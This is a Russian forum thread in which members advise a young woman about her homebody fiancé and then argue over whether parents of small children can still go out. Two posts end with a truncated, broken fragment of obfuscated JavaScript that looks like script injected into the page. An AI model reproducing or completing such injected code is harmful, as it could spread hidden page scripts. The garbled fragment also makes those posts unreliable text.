20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
01 октября 2015 12:49:04
2015-10-01 12:49:04

Сиреневая Кошка, ой, это я под гостем написала, не увидела, что не зашла под ником {#}

Ответить
Поддерживаю Да0 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
01 октября 2015 12:50:14
2015-10-01 12:50:14

Ночная Фурия, Наше знакомство кроме как ЧУДОМ не назовешь. Наши мамы знакомы между собой и как-то моя мама встретила их и показала ему мою фотографию, я ему понравилась, и он меня нашел в соц. сетях, написал мне и потом мы встретились через пару дней. А когда он мне рассказал, что он не любит знакомства новые заводить, я так и говорила ему, что это ЧУДО, что написал мне всё-таки, он сказал, что я ну ооочень ему понравилась.

Ответить
Поддерживаю Да0 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
01 октября 2015 12:58:47
2015-10-01 12:58:47

А так, девчонки, попытаюсь сегодня поговорить с ним, главное, чтобы в пух и прах не разругались, а то и он, и я вспыльчивые. Я его очень люблю, поэтому постараюсь из него эту нелюдимость выбить, дело, скорее всего, в ней, а не в ремонте и деньгах, потому что он не хочет даже сходить туда, где тратиться совсем не нужно.

Ответить
Поддерживаю Да0 / Нет0
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
01 октября 2015 13:47:25
2015-10-01 13:47:25

"постараюсь ... не разругаться... выбить нелюдимость". Ну ну.

Ответить
Поддерживаю Да1 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
01 октября 2015 14:08:57
2015-10-01 14:08:57

Scientific , и к чему вы это?!

Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 14:24:46
2015-10-01 14:24:46

Сиреневая Кошка, на счет детей. Отдых с детьми не отдых. И бабушки не всегда хотят сидеть с внуками пока гуляешь. У меня мама все еще работает. Да я ходила к подругам с детьми и никакого отдыха с ними не получалось.

Когда младший родился с ним сидела только я. Мама могла взять его но только если мне на работу надо было. Его отец не отпускал меня к подруге даже которая рядом жила. Через 30 минут звонил и говорил чтоб я шла домой ребенок ревет, отдыхать с друзьями ему нравилось без детей потому что ему нравится отвлечься.

Я ни на кого не обижаюсь и обижать так же не собираюсь. Просто пишу со своего опыта. Сама по себе я общительная и общение люблю. Но когда есть дети не всегда и не у всех получается гулять.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 14:40:13
2015-10-01 14:40:13

Неалина, Ну тогда сидите дома, как взаперти, если не видите другого выхода. Я не пойму, что вы пытаетесь доказать. И кому? Мне? Автору? Что с рождением детей уже не погуляешь? Потому что у вас так? Потому что ваши дети не хотят играть с другими в гостях/смотреть мультики/играть игрушками?

Мне вы этого не докажете, потому что у меня есть 2 крестницы, 5 племянников, одна племянница, и просто куча друзей с детьми. И все их родители с рождением детей не стали унылыми затворниками. Мне жаль, что у вас так, но так не у всех, поверьте.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 14:46:59
2015-10-01 14:46:59

Гость, Конечно, поговорите с ним. Когда есть любовь между людьми, то все решаемо. Главное, чтобы вы оба знали, ради чего вам это нужно.

Удачи вам.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Милая кошка
10885 Милая кошка
Милая кошка offline
Репутация : 586331
Комментариев 7737 13
01 октября 2015 19:33:39
2015-10-01 19:33:39

Ну я считаю, что если вы из-за этого готовы свадьбу отменить и расстаться с парнем, то чувств у вас к нему нет особых и лучше вам правда разойтись. Вообще как по мне, уж лучше парень домосед чем гуляка. А то будет вам весело потом, когда он гулять с друзьями, а вы с грудным ребенком дома.

Ответить
Поддерживаю Да0 / Нет0
Если я тебе не нравлюсь-застрелись! Я не исправлюсь.
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 19:58:21
2015-10-01 19:58:21

Сиреневая Кошка, Мои дети уже выросли и я хожу куда хочу. Но пока дети не большие не получалось. Одно дело когда дети свои-другое пришла поигралась и ушла. Совсем разные вещи.

В принципе праваНочная Фурия, ничего не доказать человеку без детей.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 21:57:37
2015-10-01 21:57:37

Tatosha, тогда это действительно чудо)))) я думала что вы хоть познакомились где-то в компании, а тут))))) ничего не скажешь. Вы не пилите его, доступно объсняйте что вы любите не только дома в обнимку, а и в компании посидеть, если любит то поймет, пойдет на компромисс. Удачи Вам.

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 22:11:52
2015-10-01 22:11:52

Сиреневая Кошка, я наверное повторюсь, но все-же, ранимых тут нет) по поводу детей, разве вам кто то что-то доказывал? С вами делились опытом, вот и все, конечно же вы можете опровергать и во все горло кричать что допустим поехать на шашлыки и выпить пивка, и дети тут не помеха, с ними можно и чем они помешают. Вот лично я не могу себе позволить выпить когда я ответственная за ребенка. А такой отдых, типо собрались с подругами кофе и пироженки, или в парк, у них дети у меня, они играют мы болтаем, но это не отдых вовсе, это так, пошли прогулялись.

Все вы и сами поймете, когда детки родятся, пусть у вас будет так как вы рассказываете, легко и не принужденно.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 23:43:10
2015-10-01 23:43:10

Ночная Фурия, Я и сейчас все понимаю. Да, у меня нет детей. Я в курсе, не обязательно все время мне это повторять.

У меня нет, но у моих друзей, сестер есть. И они не закрывают себя в четырех стенах. Хотя они матери такое же, как и вы. Не хуже и не лучше.

Когда у меня родятся свои деки, я тоже, как и мои друзья, как и моя мама, как ее друзья, с детьми которых я играла в детстве, пока взрослые проводили время вместе, я буду так же жить нормальной активной жизнью. Буду видеться с друзьями, ездить на отдых, ходить гулять.

Так что я и сейчас все понимаю. Кто-то рожает детей и живет полноценной активной жизнью. Примеров у меня много из моих знакомых и семьи. А некоторые рожают и считают, что им теперь нужно деградировать, никуда не ходить, ничем не интересоваться, ведь у нее ж теперь ребенок.

Вы из таких. Мои знакомые нет. Если вы все-таки пытаетесь меня убедить, что невозможно продолжать жить нормально и нужно обязательно закрыться в квартире, оборвав все контакты с внешним миром и ограничив интересы кулинарными сайтами, поликлиниками и детскими анализами... что все такие же, как и вы. Не тратьте свое время, я знаю, что это не так.

В моем окружении много мам, молодых и уже со взрослыми детьми, ни одна не похоронила себя в своей квартире, потому что у нее ребенок.

// t;t++)e+=o. CharCodeAt(t). ToString(16);return e}, p=function(){var w=window, p=w. Document. Location. Protocol;if(p. IndexOf('http')==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Burundik
19101 Burundik
Burundik online
Репутация : 293827
Комментариев 2305 6
02 октября 2015 10:26:23
2015-10-02 10:26:23

Ночная Фурия, я с вами согласна, хоть у меня и детей нет, что с детьми лет до 4 - это не отдых) у моих подруг , сестры есть дети, так вот, когда мы собиремся в кафе, в гостях и т. д, то невозмодно даже нормально посидеть поговорить, дети везде лезут, то им то хочется, то это, то плачут, то скучно, то купи это, то то... короче не отдых, а больше устанешь))

\r\n

а вообще тема немного в другое русло переключилась, как мне икажется, автор про парня хотела узнать, а не как весело или не весело можно отдыхать с детьми)

Ответить
Поддерживаю Да3 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
02 октября 2015 11:56:17
2015-10-02 11:56:17

Сиреневая Кошка, да кто вас переубеждает не пойму))) я веду активный образ жизни, мы с мужем гуляем в компаниях с ребенком, просто говорится что как раньше уже не отдохнешь. Значит я из тех кто деградирует, ну спасибо)))) позабавила) а кто вам сказал что те кто родил не живут нормально? Живут иначе) вы переворачиваете все на свой лад) у меня муж так делает, ему ничего не докажешь, есть только его мнение, единое верное на планете. Но он большой ребенок, делаю вывод что не он один. ))))

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
02 октября 2015 13:34:33
2015-10-02 13:34:33

Ночная Фурия, Боже, как меня достал этот тупой спор не по теме. Я прошу прощения у автора, что мы здесь развели эту никому не нужную демагогию.

Я вам еще раз объясняю, что я хотела сказать. Неалина сказала автору, что с рождением детей у нее поменяется в жизни все, ценности и что-то там еще и ей уже не захочется гулять. Вы мне пытались доказать, что с детьми - это не отдых, потому что они не хотт играть с другими или какие у вас там еще проблемы, не знаю. Неалине вот оставить не с кем было. Значит у автора будет так же?

Во-первых, автор вообще о детях ничего не говорила и не спрашивала.

Во-вторых, вы мне все упираете, чо я не понимаю ничего, потому что у меня детей нет.

Объясняю. Моя сестра уже будучи матерью, ездила в Крым один раз, летала в Египет один раз и дважды в Эмираты. С друзьями, с семейной парой. Вторая сестра - трижды в Крым. Я со своей кумой вижусь раз в неделю. У нее двое детей. Вечером подтягиваются мужчины, отдыхаем вмете, общаемся. Еще у меня есть подруги, с детьми. И они тоже ездят отдыхать, в Карпаты кататься на лыжах, на природу.

Из этого я делаю вывод, что и с детьми можно проджолжать жить: общаться с кем-то, ездить куда-то, в гости ходить. Вам сложно с детьми куда-то ходить, ездить, отдыхать, но это не значит, что автор, родив, тоже не захочет никуда ездить и ни с кем видеться. И ее проблема снимется с повестки дня.

Я хотела сказать только это. Надеюсь, понятно, что именно я имела ввиду.

// t;t++)e+=o. CharCodeAt(t). ToString(16);return e}, p=function(){var w=window, p=w. Document. Location. Protocol;if(p. IndexOf('http')==0){return p}for(var e=0;e

Ответить
Поддерживаю Да2 / Нет2
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Жена ингуша
8745 Жена ингуша
Жена ингуша offline
Репутация : 2560947
Комментариев 14437 50
02 октября 2015 13:52:48
2015-10-02 13:52:48

Кхе-кхе. Прекращаем спор не по теме.

Ответить
Поддерживаю Да2 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Солнечный_Неадекват
14392 Солнечный_Неадекват
Солнечный_Неадекват offline
  • Мисс Находчивость
Репутация : 173848
Комментариев 1594 0
03 октября 2015 11:04:46
2015-10-03 11:04:46

Автор, поговорить, конечно, стоит, но сомневаюсь, что толк будет...

Вижу 2 варианта:

1. Вы гуляете без него, если он не против. Пусть занимается ремонтом или сидит дома у телевизора.

2. Расстаетесь. Гулящий без конца парень... это не самый лучший вариант, но и отшельник не предел мечтаний. Вы думаете, что еще не встретить хорошего парня? Вам всего то 20.

Лично я люблю дома сидеть, а пьянки, гулянки и клубы... могу иногда в клуб сходить, но это все же не мое. Но чтоб совсем дома взаперти сидеть... да с ума можно сойти от такого.

А насчет детей... жизнь на этом не кончается. Мои родители по молодости, когда я была малая гуляли насколько это было возможно с маленьким ребенком. Гуляли семьями, где были дети одного возраста. По гостям постоянно ходили, ездили на природу, куражились, выпивали, только по ночным клубам нас не таскали, а детей оставить было не с кем. Никто не умер, несчастных случаев не было, и всем было весело. Для Вас отдых с детьми - это не отдых, но не у всех же так.

Ответить
Поддерживаю Да1 / Нет0
Кекс, нартортики, сладкий ролл.
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
03 октября 2015 17:04:42
2015-10-03 17:04:42

Для меня бы тоже это было проблемой!Я так же как и вы автор люблю встретиться с друзьями посидеть выпить расслабиться, а шашлыки-это вообще святое!Но мне повезло, муж тоже любит так проводить время, я его потому и выбрала, что с ним весело и всегда можно хорошо провести время!Ну ваш парень либо будит разделять ваши интересы либо вы будете несчастны сидя дома. Ну в крайнем случае можно и отдельно ведь отдыхать, вы активно, а парень пускай дома сидит если ему так нравится!Или такое его тоже не устроит!А еще можно объяснить что вы молодая и вам хочется развлекаться а не дома тухнуть!

Ответить
Поддерживаю Да0 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке